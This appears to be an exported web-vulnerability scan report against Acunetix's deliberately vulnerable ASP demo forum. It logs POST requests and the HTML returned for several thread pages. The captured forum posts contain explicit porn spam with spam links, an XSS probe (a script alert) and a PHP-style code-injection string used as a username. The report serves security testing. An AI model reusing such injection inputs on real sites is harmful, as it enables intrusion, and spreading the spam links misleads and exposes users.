<b>victoriadi1</b> on 3/13/2022 10:23:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot galleries, daily updated collections - 185.220.101.65</div><div class='posttext'>Sexy photo galleries, daily updated pics http://freeponocom.instakink.com/?kiley free guy gay porn mike mo shoes in a porn men fucking animals porn college skinny porn preview 3d porn megasite </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3437 |
| Response Body - size: 3,437 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>susanac1</b> on 3/13/2022 12:03:13 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics - 178.20.55.18</div><div class='posttext'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn http://chickasawpornloaderfree.topanasex.com/?elena tammy amazing race 14 pics porn emporers new school porn matue gay porn schoolgirl anami porn newcomers porn star 2008 girl </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3468 |
| Response Body - size: 3,468 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>kristiela3</b> on 3/13/2022 3:28:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates - 185.220.101.158</div><div class='posttext'>Sexy photo galleries, daily updated collections http://classicporn.bestsexyblog.com/?tiana free cartton porn videos singapore 3gp porn xhamster black porn tube bully threpy porn free amutear porn movies </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 3357 |
| Response Body - size: 3,357 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum New hot project galleries, daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/New hot project galleries, daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>friedajd1</b> on 3/13/2022 9:02:56 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>New hot project galleries, daily updates - 109.70.100.83</div><div class='posttext'>Free Porn Galleries - Hot Sex Pictures http://allsexiimage.paintandparty.hotblognetwork.com/?ximena messy sex porn free porn excite deaf mute porn internet porn help la bleu porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 3406 |
| Response Body - size: 3,406 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Free Porn Pictures and Best HD Sex Photos </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Free Porn Pictures and Best HD Sex Photos </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>dianezg60</b> on 3/13/2022 11:25:30 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Free Porn Pictures and Best HD Sex Photos - 185.220.102.248</div><div class='posttext'>Daily updated super sexy photo galleries http://abiquiu.lexixxx.com/?felicia free hot top porn web free gay porn clips video shorties categorized porn moviewas fanfiction naruto porn stories asian pics xxx asia quest porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3109 |
| Response Body - size: 3,109 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum test </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/test </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/14/2022 1:14:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>test - 180.75.236.192</div><div class='posttext'><script>alert("HI")</script></div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3356 |
| Response Body - size: 3,356 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot photo galleries blogs and pictures </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot photo galleries blogs and pictures </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>sethpq11</b> on 3/14/2022 2:11:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot photo galleries blogs and pictures - 95.214.54.97</div><div class='posttext'>My new hot project|enjoy new website http://videoonly.hotnatalia.com/?danielle party in limo porn real family orgy porn donna kane porn video top 100 porn stars list balls touching porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3309 |
| Response Body - size: 3,309 bytes. |
